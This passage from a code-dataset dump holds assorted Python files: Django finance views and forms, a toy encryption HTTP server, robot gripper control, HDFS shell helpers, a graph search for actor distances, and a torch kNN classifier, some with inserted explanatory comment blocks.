fo_bal1\n global nw_bal1\n\n ipo_list = IPO.objects.all()\n return render_to_response('ipo.html',{'ipo_list':ipo_list,\"user_name\":user_name ,\"tot_bal1\":tot_bal1 , \"po_bal1\":po_bal1 ,\"nw_bal1\":nw_bal1,})\n \ndef fo_detail(request):\n global user_name\n global user_id1 \n global tot_bal1\n global mf_bal1\n global po_bal1\n global fo_bal1\n global nw_bal1\n\n fo_list = FO.objects.all()\n return render_to_response('fo.html',{'fo_list':fo_list,\"user_name\":user_name ,\"tot_bal1\":tot_bal1 , \"fo_bal1\":fo_bal1 ,\"nw_bal1\":nw_bal1,})\ndef thank_detail(request):\n global user_name\n global user_id1 \n global tot_bal1\n global mf_bal1\n global po_bal1\n global fo_bal1\n global nw_bal1\n global mfid\n global quantity\n global price\n global total\n i=0\n counter=0\n user = account.objects.get(pk=user_id1)\n mfid = 
request.POST[\"abc1\"]\n p = MutualFund.objects.get(pk=mfid)\n mf_list = MutualFund.objects.all()\n fo_list = FO.objects.all()\n for mf in mf_list:\n i=i+1\n mfid = request.POST[\"abc\"+str(i)]\n quantity = request.POST[\"abcd\"+str(i)]\n if quantity!=\"\":\n p = MutualFund.objects.get(pk=mfid)\n price=int(p.mf_cost)\n total=price*int(quantity)\n if int(quantity)<=int(p.mf_Qty):\n if total<=mf_bal1:\n user.mf_bal=int(user.mf_bal)-total\n user.tot_bal=int(user.tot_bal)-total\n user.save()\n p.mf_Qty=int(p.mf_Qty)-int(quantity)\n p.save()\n counter=1\n mf_bal1=user.mf_bal \n quantity=p.mf_Qty\n \n return render_to_response('Thank.html',{'fo_list':fo_list,\"user_name\":user_name ,\"tot_bal1\":tot_bal1 , \"fo_bal1\":fo_bal1 ,\"nw_bal1\":nw_bal1,\"user_id1\":user_id1,\"total\":total,\"counter\":counter,\"mf_bal1\":mf_bal1,\"quantity\":quantity})\n\ndef thank1_detail(request):\n global user_name\n global user_id1 \n global tot_bal1\n global mf_bal1\n global po_bal1\n global fo_bal1\n global nw_bal1\n global mfid\n global quantity\n global price\n global total\n i=0\n counter=0\n user = account.objects.get(pk=user_id1)\n mfid = request.POST[\"abc1\"]\n p = IPO.objects.get(pk=mfid)\n ipo_list = IPO.objects.all()\n fo_list = FO.objects.all()\n for ipo in ipo_list:\n i=i+1\n mfid = request.POST[\"abc\"+str(i)]\n quantity = request.POST[\"abcd\"+str(i)]\n if quantity!=\"\":\n p = IPO.objects.get(pk=mfid)\n price=int(p.ipo_cost)\n total=price*int(quantity)\n if int(quantity)<=int(p.ipo_Qty):\n if total<=po_bal1:\n user.po_bal=int(user.po_bal)-total\n user.tot_bal=int(user.tot_bal)-total\n user.save()\n counter=1\n mf_bal1=user.po_bal \n p.ipo_Qty=int(p.ipo_Qty)-int(quantity)\n p.save()\n po_bal1=user.po_bal\n \n return render_to_response('Thank1.html',{'fo_list':fo_list,\"user_name\":user_name ,\"tot_bal1\":tot_bal1 , \"fo_bal1\":fo_bal1 ,\"nw_bal1\":nw_bal1,\"user_id1\":user_id1,\"total\":total,\"counter\":counter,\"mf_bal1\":mf_bal1})\n\ndef thank2_detail(request):\n global user_name\n global user_id1 \n global tot_bal1\n global mf_bal1\n global po_bal1\n global fo_bal1\n global nw_bal1\n global mfid\n global quantity\n global price\n global total\n i=0\n counter=0\n user = account.objects.get(pk=user_id1)\n fo_list = FO.objects.all()\n for fo in fo_list:\n i=i+1\n mfid = request.POST[\"abc\"+str(i)]\n quantity = request.POST[\"abcd\"+str(i)]\n if quantity!=\"\":\n p = FO.objects.get(pk=mfid)\n price=int(p.fo_cost)\n total=price*int(quantity)\n if int(quantity)<=int(p.fo_Qty):\n if total<=mf_bal1:\n user.fo_bal=int(user.fo_bal)-total\n user.tot_bal=int(user.tot_bal)-total\n user.save() \n counter=1\n fo_bal1=user.fo_bal \n p.fo_Qty=int(p.fo_Qty)-int(quantity)\n p.save()\n \n \n return render_to_response('Thank2.html',{'fo_list':fo_list,\"user_name\":user_name ,\"tot_bal1\":tot_bal1 , \"fo_bal1\":fo_bal1 ,\"nw_bal1\":nw_bal1,\"user_id1\":user_id1,\"total\":total,\"counter\":counter,\"mf_bal1\":mf_bal1})\n","sub_path":"financial_management/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"524907021","text":"from django.urls import path\nfrom .views import (Poster, CreateSession, BuyTicket, CreateCinemaHall,\n CreateMovie, BasketListView, UpdateSession, DeleteSession)\n\n\nurlpatterns = [\n path('', Poster.as_view(), name='poster'),\n path('create_session/', CreateSession.as_view(), name='create_session'),\n path('update_session/', UpdateSession.as_view(), 
name='update_session'),\n path('delete_session/', DeleteSession.as_view(), name='delete_session'),\n path('create_cinema_hall/', CreateCinemaHall.as_view(), name='create_cinema_hall'),\n path('buy_ticket/', BuyTicket.as_view(), name='buy_ticket'),\n path('create_movie/', CreateMovie.as_view(), name='create_movie'),\n path('basket/', BasketListView.as_view(), name='basket'),\n]\n","sub_path":"cinema/cinema_box_office/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"444185122","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 25 13:55:35 2020\n@author: generic\n\"\"\"\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport time, sys, base64, json\nfrom urllib import parse\n\nhostName = \"localhost\"\nserverPort = 8080\n\n\nclass MyServer(BaseHTTPRequestHandler):\n history = []\n def do_GET(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.send_header(\"Access-Control-Allow-Origin\", \"*\")\n self.end_headers()\n if self.getPage() == '/':\n html = open(\"encryptionBase.html\")\n htmlString = html.read()\n html.close()\n self.wfile.write(bytes(htmlString.replace(\"_PLACEHOLDER_\",\"No encryption has yet been performed\"), \"utf-8\"))\n\n if self.getPage() == \"/encrypt\":\n params = self.getParams()\n encryptedText = self.encode(params['key'], params['plainText'])\n self.wfile.write(encryptedText)\n self.history.append(encryptedText.decode(\"utf-8\"))\n\n if self.getPage() == \"/decrypt\":\n params = self.getParams()\n decryptedText = self.decode(params['key'], params['cipherText'])\n self.wfile.write(bytes(decryptedText, \"utf-8\"))\n\n if self.getPage() == \"/history\":\n json.dumps(self.history)\n self.wfile.write(bytes(json.dumps(self.history), \"utf-8\"))\n # Gets the query parameters of a request and returns them as a dictionary\n def getParams(self):\n output = {}\n queryList = parse.parse_qs(parse.urlsplit(self.path).query)\n for key in queryList:\n if len(queryList[key]) == 1:\n output[key] = queryList[key][0]\n return output\n\n # Returns a string containing the page (path) that the request was for\n def getPage(self):\n return parse.urlsplit(self.path).path\n\n def encode(self, key, plaintext):\n output = []\n for i in range(len(plaintext)):\n key_c = key[i % len(key)]\n enc_c = (ord(plaintext[i]) + ord(key_c)) % 256\n output.append(enc_c)\n return base64.urlsafe_b64encode(bytes(output))\n\n def decode(self, key, ciphertext):\n output = []\n ciphertext = base64.urlsafe_b64decode(ciphertext)\n for i in range(len(ciphertext)):\n key_c = key[i % len(key)]\n dec_c = chr((256 + ciphertext[i] - ord(key_c)) % 256)\n output.append(dec_c)\n return \"\".join(output)\n\n\nif __name__ == \"__main__\":\n webServer = HTTPServer((hostName, serverPort), MyServer)\n print(\"Server started at 127.0.0.1:8080\")\n\n try:\n webServer.serve_forever()\n except:\n webServer.server_close()\n print(\"Server stopped.\")\n sys.exit()\n\n webServer.server_close()\n print(\"Server stopped.\")\n sys.exit()","sub_path":"Python/pythonBase.py","file_name":"pythonBase.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"634154531","text":"#****************************************************************************************\n#\n# Author : Aniruddha Shembekar, University of Southern 
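# --- editorial annotation ---------------------------------------------------
# encode/decode in the server record above implement a Vigenere-style byte
# shift followed by urlsafe base64. A hedged, standalone round-trip check of
# the same scheme (module-level functions for illustration; the originals are
# methods on MyServer):
import base64

def vig_encode(key, plaintext):
    out = [(ord(c) + ord(key[i % len(key)])) % 256 for i, c in enumerate(plaintext)]
    return base64.urlsafe_b64encode(bytes(out))

def vig_decode(key, ciphertext):
    raw = base64.urlsafe_b64decode(ciphertext)
    return "".join(chr((256 + b - ord(key[i % len(key)])) % 256) for i, b in enumerate(raw))

assert vig_decode("key", vig_encode("key", "hello world")) == "hello world"
# -----------------------------------------------------------------------------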
California\n#\n#****************************************************************************************\n\nimport serial \nimport time\nimport sys\nimport gripper_comm\nimport arduino_comm\n\n# to give admin access to usb ports - \n# sudo chmod 666 /dev/ttyACM0\n# sudo chmod 666 /dev/ttyUSB1\n# sudo chmod 666 /dev/ttyUSB3\n\nconnect_arduino = False\n\nclass GripperState():\n\tdef __init__(self,arduino_comm_num=0,gripper1_comm_num=3,gripper2_comm_num=1):\n\t\tself.time_gap_valve_and_gripper = 0.1\n\t\tif connect_arduino:\n\t\t\t# arduino object\n\t\t\tself.objarduino=arduino_comm.CommModule(arduino_comm_num)\n\t\t\tself.objarduino.arduinocomm()\n\t\t# gripper 1 object\n\t\tprint(\"gripper1_comm_num :\" + str(gripper1_comm_num))\n\t\tself.objgripper1=gripper_comm.GripperIO(gripper1_comm_num)\n\t\tself.objgripper1.set_speed(255)\n\t\tself.objgripper1.set_force(0)\n\t\t# gripper 2 object\n\t\tprint(\"gripper2_comm_num :\"+str(gripper2_comm_num))\n\t\tself.objgripper2=gripper_comm.GripperIO(gripper2_comm_num)\n\t\tself.objgripper2.set_speed(255)\n\t\tself.objgripper2.set_force(0)\n\t\tself.open_pos_g1 = 170\n\t\tself.open_pos_g2 = 170\n\t\tself.close_pos_g1 = 255\n\t\tself.close_pos_g2 = 255\n\n\tdef activate_grippers(self):\n\t\ttry:\n\t\t\tself.objgripper1.activate()\n\t\texcept:\n\t\t\tprint(\"gripper 1 could not be activated\")\n\t\ttry:\n\t\t\tself.objgripper2.activate()\n\t\texcept:\n\t\t\tprint(\"gripper 2 could not be activated\")\n\n\tdef set_open_pos(self,gripper_num,val):\n\t\tif (gripper_num==1):\n\t\t\tself.open_pos_g1 = val\n\t\tif (gripper_num==2):\n\t\t\tself.open_pos_g2 = val\n\n\tdef set_close_pos(self,gripper_num,val):\n\t\tif (gripper_num==1):\n\t\t\tself.close_pos_g1 = val\t\n\t\tif (gripper_num==2):\n\t\t\tself.close_pos_g2 = val\t\n\n\tdef valve_open(self,valve1,valve2):\n\t\tself.objarduino.valve_open(valve1)\n\t\ttime.sleep(2*self.time_gap_valve_and_gripper)\n\t\tself.objarduino.valve_open(valve2)\n\t\ttime.sleep(self.time_gap_valve_and_gripper) \n\t\t\t\n\tdef valve_close(self,valve1,valve2):\n\t\ttime.sleep(0.1)\n\t\tself.objarduino.valve_close(valve1)\n\t\tself.objarduino.valve_close(valve2)\n\t\ttime.sleep(self.time_gap_valve_and_gripper)\n\n\tdef open(self,gripper_num):\n\t\tif (gripper_num==1):\n\t\t\tif connect_arduino:\n\t\t\t\tself.valve_open(1,2)\n\t\t\telse:\n\t\t\t\ttime.sleep(3*self.time_gap_valve_and_gripper)\n\t\t\tself.objgripper1.go_to(self.open_pos_g1)\n\t\t\tif connect_arduino:\n\t\t\t\tself.valve_close(1,2)\n\t\t\telse:\n\t\t\t\ttime.sleep(3*self.time_gap_valve_and_gripper)\n\n\t\tif (gripper_num==2):\n\t\t\t# print(\"reached here from gripper state code\")\n\t\t\tif connect_arduino:\n\t\t\t\tself.valve_open(3,4)\n\t\t\telse:\n\t\t\t\ttime.sleep(3*self.time_gap_valve_and_gripper)\n\t\t\tself.objgripper2.go_to(self.open_pos_g2)\n\t\t\tif connect_arduino:\n\t\t\t\tself.valve_close(3,4)\n\t\t\telse:\n\t\t\t\ttime.sleep(3*self.time_gap_valve_and_gripper)\n\t\t\t\n\tdef close(self,gripper_num):\n\t\tif (gripper_num==1):\n\t\t self.objgripper1.go_to(self.close_pos_g1)\n\t\tif (gripper_num==2):\n\t\t\tself.objgripper2.go_to(self.close_pos_g2)\n\t\t \n","sub_path":"robots_server/scripts/gripper_state.py","file_name":"gripper_state.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"313221387","text":"#####################################\n# if bresenham is not installed yet:\n#import pip\n#pip.main(['install', 
'bresenham'])\n#####################################\n\nfrom mesa.visualization.modules import CanvasGrid\nfrom mesa.visualization.ModularVisualization import ModularServer\nfrom mesa.visualization.modules import ChartModule\n\n# Import the implemented classes\nimport IPython\nimport os\nimport sys\n\n# Change stdout so we can ignore most prints etc.\norig_stdout = sys.stdout\n\nsys.stdout = open(os.devnull, 'w')\n\nIPython.get_ipython().magic(\"run amongus_model.ipynb\")\nsys.stdout = orig_stdout\n\n# You can change this to whatever you want. Make sure to make the different types\n# of agents distinguishable\ndef agent_portrayal(agent):\n if type(agent) == Crewmate:\n portrayal = {\"Shape\": \"images\\crewmate.png\",\n \"Layer\": 1,\n \"scale\": 7}\n elif type(agent) == Imposter:\n portrayal = {\"Shape\": \"images\\imposter.png\",\n \"Layer\": 1,\n \"scale\": 7}\n elif type(agent) == Wall:\n portrayal = {\"Shape\": \"rect\",\n \"Color\": \"black\",\n \"Filled\": \"true\",\n \"Layer\": 1,\n \"w\": 1,\n \"h\": 1}\n elif type(agent) == Obstruction:\n portrayal = {\"Shape\": \"rect\",\n \"Color\": \"gray\",\n \"Filled\": \"true\",\n \"Layer\": 1,\n \"w\": 1,\n \"h\": 1}\n elif type(agent) == Vent:\n portrayal = {\"Shape\": \"rect\",\n \"Color\": \"green\",\n \"Filled\": \"true\",\n \"Layer\": 1,\n \"scale\": 4,\n \"w\": 1,\n \"h\": 1}\n \n elif type(agent) == ShortTask:\n portrayal = {\"Shape\": \"rect\",\n \"Color\": \"pink\",\n \"Filled\": \"true\",\n \"Layer\": 1,\n \"scale\": 2,\n \"w\": 1,\n \"h\": 1}\n \n return portrayal\n\n# Create a grid of 114 by 114 cells, and display it as 570 by 570 pixels\n# grid = CanvasGrid(agent_portrayal, 114, 114, 570, 570)\ngrid = CanvasGrid(agent_portrayal, 242, 138, 1210, 690)\n\n# Create the server, and pass the grid and the graph\nserver = ModularServer(AmongUs,\n [grid],\n \"AmongUs\", \n {'map_name': 'the_skeld', \n 'n_crew': 3,\n 'n_impo': 1})\n\nserver.port = 8523\n\nserver.launch()\n","sub_path":"visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"333134165","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport traceback\nimport sys\nimport os\nimport time\nimport datetime\nfrom framework.log import getlogger\nimport util\nimport fileoperation\n\ndef checkOrCreatePartition(req):\n retVal,output = util.executeCMDWithTimeout(req,float(20))\n #getlogger().info(\"after exec:%s retval type:%s\",req,type(retVal))\n if retVal == 127:\n getlogger().error(\"[%s] '%s' exc result:%s, hadoop client no install\",os.path.basename(__file__),req,retVal)\n return False\n if retVal !=0 :\n getlogger().warning(\"%s exec result:%s\",req,str(retVal))\n return False\n return True\n\n# -1 : fault error, 1 : exist 0: not exist\ndef isDirExist(dirInfo, logger):\n check_dir_req = \"hadoop fs -test -e %s\" %(dirInfo)\n retval,output = util.executeCMD3(check_dir_req)\n if retval == 127:\n logger.error(\"[%s] '%s' exc result:%s, hadoop client no install\",os.path.basename(__file__),check_dir_req,retval)\n return -1\n if retval == 0:\n return 1\n else:\n return 0\n\ndef createDir(dirInfo, logger):\n mkdir_dir_req = \"hadoop fs -mkdir -p %s\" %(dirInfo)\n retval ,output = util.executeCMD3(mkdir_dir_req)\n if retval == 127:\n logger.error(\"[%s] '%s' exc result:%s, hadoop client no install\", os.path.basename(__file__),mkdir_dir_req,retval)\n return False\n if retval !=0 :\n logger.error(\"[%s] '%s' exc failed:%s\", 
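# --- editorial annotation ---------------------------------------------------
# isDirExist in the hdfsOperation record below leans on shell exit codes:
# `hadoop fs -test -e` exits 0 when the path exists, non-zero otherwise, and
# the shell reports 127 when the hadoop client itself is missing. A hedged
# subprocess-based equivalent (illustrative; the original routes through
# util.executeCMD3):
import subprocess

def hdfs_path_exists(path):
    rc = subprocess.call("hadoop fs -test -e %s" % path, shell=True)
    if rc == 127:                        # shell convention: command not found
        raise RuntimeError("hadoop client not installed")
    return rc == 0
# -----------------------------------------------------------------------------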
os.path.basename(__file__), mkdir_dir_req,retval)\n return False\n return True\n\ndef fileSiz(dirInfo):\n file_size_req = \"hadoop fs -du %s |awk '{print $1}' \" % (dirInfo)\n retval,sizeInfo = util.executeCMD3(file_size_req)\n if sizeInfo is None :\n getlogger().warning(\"[%s] %s exc failed for:%s\",os.path.basename(__file__),file_size_req,util.getExceptInfo())\n return 0\n return int(sizeInfo)\n\ndef renameFile(oldFilename, newFilename, logger):\n req = \"hadoop fs -mv %s %s\" % (oldFilename,newFilename)\n retVal,output= util.executeCMD3(req)\n if retVal == 127:\n getlogger().error(\"[%s] '%s' exc result:%s, hadoop client no install\", os.path.basename(__file__),req,retVal)\n return False\n if retVal != 0:\n getlogger().warning(\"[%s] '%s' exec result:%s\", os.path.basename(__file__),req, retVal)\n return False\n return True\n \ndef checkOrCreateDir(dirInfo, logger):\n return createDir(dirInfo, logger)\n\ndef fileSizCheck(dirInfo,srcSiz,retries):\n hdfsSiz = 0\n for i in range(retries):\n hdfsSiz = fileSiz(dirInfo)\n if hdfsSiz != srcSiz:\n time.sleep(0.1)\n else:\n return True,hdfsSiz\n return False,hdfsSiz\n\n\ndef removeFile(filenameWithPath, logger):\n req = \"hadoop fs -rm %s \" % (filenameWithPath)\n retVal,output= util.executeCMD3(req)\n if retVal == 127:\n logger.error(\"[%s] exe:'%s' failed result:%s, hadoop client no install\", os.path.basename(__file__),req,retVal)\n return False\n if retVal != 0:\n logger.error(\"[%s] exe:'%s' failed result:%s\",os.path.basename(__file__),req,retVal)\n return False\n return True\n\ndef moveFileToHDFS(srcDir,destDir, logger):\n req = \"hadoop fs -moveFromLocal %s %s\" % (srcDir,destDir)\n retVal,output = util.executeCMD3(req)\n if retVal == 127:\n logger.error(\"[%s] '%s' exc result:%s, hadoop client no install\", os.path.basename(__file__),req,retVal)\n return False\n if retVal != 0:\n return False\n return True\n\ndef storeFileToHadoop(srcDir,partitionDir, logger):\n tempfile = os.path.join(partitionDir,\".\" + os.path.basename(srcDir))\n #srcSize = fileoperation.fileSize(srcDir)\n # now file not exist!\n if not moveFileToHDFS(srcDir,tempfile, None):\n # maybe partition not exist\n if not createDir(partitionDir, logger):\n return False\n if not moveFileToHDFS(srcDir, tempfile, logger):\n # maybe file is exist\n rcode = int(isDirExist(tempfile, logger))\n if rcode != 1:\n # file not is exist\n return False\n # remove file\n if not removeFile(tempfile, logger):\n return False\n if not moveFileToHDFS(srcDir, tempfile, logger):\n req = \"hadoop fs -moveFromLocal %s %s\" % (srcDir, tempfile)\n logger.error(\"[%s] exe:'%s' failed\", os.path.basename(__file__), req)\n return False\n # now tmpfile success\n lastFilename = os.path.join(partitionDir,os.path.basename(srcDir))\n if not renameFile(tempfile,lastFilename, logger):\n # may be file is exist\n rcode = int(isDirExist(lastFilename, logger))\n if rcode != 1:\n # file not is exist\n return False\n # remove file\n if not removeFile(lastFilename, logger):\n return False\n if not renameFile(tempfile, lastFilename, logger):\n return False\n return True","sub_path":"loadhdfs/utils/hdfsOperation.py","file_name":"hdfsOperation.py","file_ext":"py","file_size_in_byte":4917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"349722104","text":"from django import forms\nfrom django.contrib.auth.models import User\nfrom register.models import Student, Parent\nfrom .models import Profile\nfrom django.contrib.auth.forms import UserCreationForm\n\n\nclass 
UserTeacherRegisterForm(UserCreationForm):\n\n class Meta:\n model = User\n fields = ['username', 'first_name', 'last_name', 'email', 'password1', 'password2']\n labels = {\n 'username': 'login',\n 'first_name': 'imię',\n 'last_name': 'nazwisko',\n 'email': 'email',\n }\n help_texts = {\n 'username': 'Podaj nazwę użytkownika',\n 'first_name': 'Podaj imię użytkownika',\n 'last_name': 'Podaj nazwisko użytkownika',\n 'email': 'Podaj email użytkownika',\n }\n\n\nclass ParentRegisterForm(forms.ModelForm):\n\n class Meta:\n model = Parent\n fields = ['students']\n\n def __init__(self, *args, **kwargs):\n super(ParentRegisterForm, self).__init__(*args, **kwargs)\n self.fields['students'].required = False\n self.fields['students'].label = 'dzieci'\n self.fields['students'].widget = forms.CheckboxSelectMultiple()\n\n\nclass UserUpdateForm(forms.ModelForm):\n class Meta:\n model = User\n fields = ['email']\n labels = {\n 'email': 'email'\n }\n help_texts = {\n 'email': 'Podaj nowy email',\n }\n\n\nclass ProfileUpdateForm(forms.ModelForm):\n class Meta:\n model = Profile\n fields = ['image', 'phone']\n labels = {\n 'image': 'zdjęcie',\n 'phone': 'telefon',\n }\n help_texts = {\n 'image': 'Podaj nowe zdjęcie',\n 'phone': 'Podaj nowy telefon',\n }\n\n\nclass UserParentStudentRegisterForm(forms.ModelForm):\n\n class Meta:\n model = User\n fields = ['first_name', 'last_name']\n labels = {\n 'first_name': 'imię',\n 'last_name': 'nazwisko',\n }\n help_texts = {\n 'first_name': 'Podaj imię użytkownika',\n 'last_name': 'Podaj nazwisko użytkownika',\n }\n\n\nclass StudentRegisterForm(forms.ModelForm):\n\n class Meta:\n model = Student\n fields = ['year_of_birth', 'classes']\n labels = {\n 'year_of_birth': 'rok urodzenia',\n 'classes': 'klasa',\n }\n help_texts = {\n 'year_of_birth': 'Podaj rok urodzenia użytkownika',\n }\n","sub_path":"school_reg/users/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"569234377","text":"\"\"\"\"\nGraph search implemented to find mutual movie actors.\nThis project will help us to understand how graph search works. 
Movie is an edge and actor is node\n@author: Segni Habulu\n\"\"\"\n\n\nfrom Graph import Graph, Edge\nfrom Queue import Queue as Queue\nfrom Node import Node\nimport time\n\n\n# we will use the following list to reset later\n\nvisited_movie = []\nvisited_actor = []\n\n\ndef load_graph(graph, file_path):\n file = open(file_path, mode=\"r\", encoding=\"utf-8\")\n for line in file.readlines():\n line = line.strip().split('/')\n movie, casts = Edge(line[0]), line[1:]\n\n # using list comprehension we add to our list and dictionary\n node_list = [Node(cast) for cast in casts]\n [graph.node_to_edge_dictionary(node, movie) for node in node_list]\n\n if movie.title not in graph.edgeToNode.keys():\n graph.edgeToNode[movie.title] = node_list\n # we will store on dictionary {movie : [nodes]}\n file.readline().strip()\n file.close()\n \n return graph\n\n\ndef distance(graph, actor1, actor2):\n\n if visited_movie is not None:\n [node.set_not_visited() for node in visited_actor]\n [edge.set_not_visited() for edge in visited_movie]\n visited_movie.clear()\n visited_actor.clear()\n\n first_node = Node(actor1)\n current_que, next_que = Queue(), Queue()\n if actor1 == actor2:\n return print(\"The distance is \", 0)\n\n _distance = 1\n current_que.enqueue(first_node)\n while not current_que.is_empty():\n cast = current_que.deque()\n if cast.name in graph.nodeToEdge.keys():\n movies = graph.nodeToEdge[cast.name]\n\n try: \n for movie in movies:\n if not movie.is_visited():\n actors = graph.edgeToNode[movie.title]\n for actor in actors:\n if not actor.is_visited():\n if actor.name == actor2:\n return print(\"minimum distance between \", actor1, \" and \", actor2, \" is \", _distance)\n actor.set_visited()\n visited_actor.append(actor)\n next_que.enqueue(actor)\n movie.set_visited()\n visited_movie.append(movie)\n except UnboundLocalError:\n return print(None)\n \n if current_que.is_empty():\n if not next_que.is_empty():\n current_que = next_que\n next_que = Queue()\n _distance += 1\n else:\n return print(\"No edge exists between nodes.\")\n\n\ndef __test__():\n start = time.time()\n graph = Graph()\n graph = load_graph(graph, \"cast.txt\")\n distance(graph, \"Knuppe, Kerry\", \"Doyle, Norman\")\n stop = time.time()\n print(stop - start, \"seconds\")\n\n start = time.time()\n distance(graph, \"Knuppe, Kerry\", \"Doyle, Norman\")\n stop = time.time()\n print(stop - start, \"seconds\")\n\n\n__test__()\n\n\n","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"274692110","text":"import torch\nimport os\nimport pandas as pd\nimport time\nfrom statistics import mode\nfrom scipy import stats as s\nfrom scipy.spatial.distance import cdist\n# from sklearn.neighbors import LocalOutlierFactor\n# from sklearn import svm\n\n\nclass knn_torch:\n def __init__(self, datafile=None, savefile=None, knn_size=10):\n\n self.knn_size = knn_size\n self.x_data = None\n self.y_data = None\n self.save_file = datafile if not savefile else savefile\n self.classes = None\n\n # self.outlier_estimator = LocalOutlierFactor(metric='minkowski', novelty=True)\n # self.outlier_estimator = svm.OneClassSVM(nu=0.1, kernel=\"rbf\", gamma=0.1)\n\n if datafile:\n print(f'loading data from file: {datafile}')\n if (os.path.exists(datafile)):\n print('File found')\n data = torch.load(datafile)\n self.x_data = data['x']\n self.y_data = data['y']\n print(\n f'Found {self.x_data.shape[0]} points with 
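# --- editorial annotation ---------------------------------------------------
# The two-queue loop in the search record above is a breadth-first search
# over the actor-movie bipartite graph. A hedged restatement of the idea with
# collections.deque and (node, depth) pairs; the plain-dict adjacency here is
# illustrative, not the Graph class used above.
from collections import deque

def bfs_distance(adjacency, start, goal):
    seen, queue = {start}, deque([(start, 0)])
    while queue:
        node, depth = queue.popleft()
        if node == goal:
            return depth
        for nxt in adjacency.get(node, ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, depth + 1))
    return None                           # the nodes are not connected

assert bfs_distance({"a": ["b"], "b": ["a", "c"], "c": ["b"]}, "a", "c") == 2
# -----------------------------------------------------------------------------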
{len(set(self.y_data))} classes')\n print(pd.Series(self.y_data).value_counts())\n self.classes = list(set(self.y_data))\n\n if torch.cuda.is_available():\n self.x_data = self.x_data.cuda()\n\n # self.outlier_estimator.fit(self.x_data.cpu())\n else:\n print('File not found')\n\n\n\n def add_points(self, x, y):\n\n # print(x.shape, len(y))\n if self.x_data == None:\n self.x_data = x\n self.y_data = y\n else:\n self.x_data = torch.cat([self.x_data, x])\n self.y_data = self.y_data + y\n self.classes = list(set(self.y_data))\n\n torch.save({'x': self.x_data.detach().cpu(),\n 'y': self.y_data}, self.save_file)\n\n # self.outlier_estimator.fit(self.x_data.cpu())\n\n\n def remove_class(self, cl):\n inds_to_keep = [idx for idx, el in enumerate(self.y_data) if el != cl]\n\n self.x_data = self.x_data[inds_to_keep]\n self.y_data = [self.y_data[i] for i in inds_to_keep]\n\n self.classes = list(set(self.y_data))\n\n torch.save({'x': self.x_data.detach().cpu(),\n 'y': self.y_data}, self.save_file)\n\n\n def classify(self, x):\n\n if self.x_data is None:\n print('No trained classes found')\n return None\n\n\n if len(x.shape) == 1:\n x = x.unsqueeze(0)\n\n clss = []\n confs = []\n min_dists = []\n for x_el in x:\n\n\n x_el = x_el.unsqueeze(0)\n dist = cdist(x_el.cpu(), self.x_data.cpu(), metric='cosine').squeeze()\n dist = torch.Tensor(dist)\n\n # dist = torch.norm(self.x_data - x_el, dim=1, p=None)\n\n # print(dist.min(), dist.max())\n\n\n knn = dist.topk(self.knn_size, largest=False)\n\n\n near_y = list(map(self.y_data.__getitem__, knn.indices))\n cl = s.mode(near_y)[0]\n\n\n frac = near_y.count(cl) / self.knn_size\n\n clss.append(cl[0])\n confs.append(frac)\n\n # print(self.outlier_estimator.n_samples_fit_, self.outlier_estimator.n_features_in_)\n\n # smallest_dist = self.outlier_estimator.predict(x_el.cpu())[0]\n # print(smallest_dist)\n\n # smallest_dist = dist[knn.indices[0]]\n # print(dist.min(), dist.max())\n # avg_dist = dist[knn.indices].max()\n min_dists.append(dist.min())\n\n\n return clss, confs, min_dists\n","sub_path":"scripts/models/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"466059197","text":"import tensorflow as tf\nimport tensorflow_datasets as tfds\nimport tensorflow_addons as tfa\nfrom tensorflow_addons.image import utils as img_utils\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\nimport time\nimport tensorflow.keras.backend as K\n\n# Global Variable to introduce randomness among each element of a batch\nRANDOM_SEED = tf.random.Generator.from_seed(\n int(np.random.uniform(low=300, high=9000)))\n\n\ndef image_scaler(image):\n \"\"\"Image Normalization.\n Args:\n image(tensorflow.python.framework.ops.Tensor): The image.\n Returns:\n A Normalized Function.\n \"\"\"\n image = tf.convert_to_tensor(image)\n image = image / 255\n return image\n\n\ndef py_func_rand():\n \"\"\"Image Normalization.\n Returns:\n jitter(tensorflow.python.framework.ops.Tensor): A random number generated\n from a uniform distrubution between -0.3 and 0.3.\n randscale(tensorflow.python.framework.ops.Tensor): A random integer between\n -10 and 19.\n \"\"\"\n randscale = np.random.randint(low=10, high=19)\n jitter_x = np.random.uniform(low=-0.1, high=0.1)\n jitter_y = np.random.uniform(low=-0.1, high=0.1)\n jitter_cx = 0.0\n jitter_cy = 0.0\n jitter_bw = np.random.uniform(low=-.05, high=.05) + 1.0\n jitter_bh = np.random.uniform(low=-.05, high=.05) + 1.0\n return 
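# --- editorial annotation ---------------------------------------------------
# classify in the knn_torch record above is k-nearest-neighbours under cosine
# distance with a majority vote. A hedged, minimal restatement of that core
# step; names are illustrative, and the original additionally reports vote
# fractions and minimum distances.
import torch
from collections import Counter
from scipy.spatial.distance import cdist

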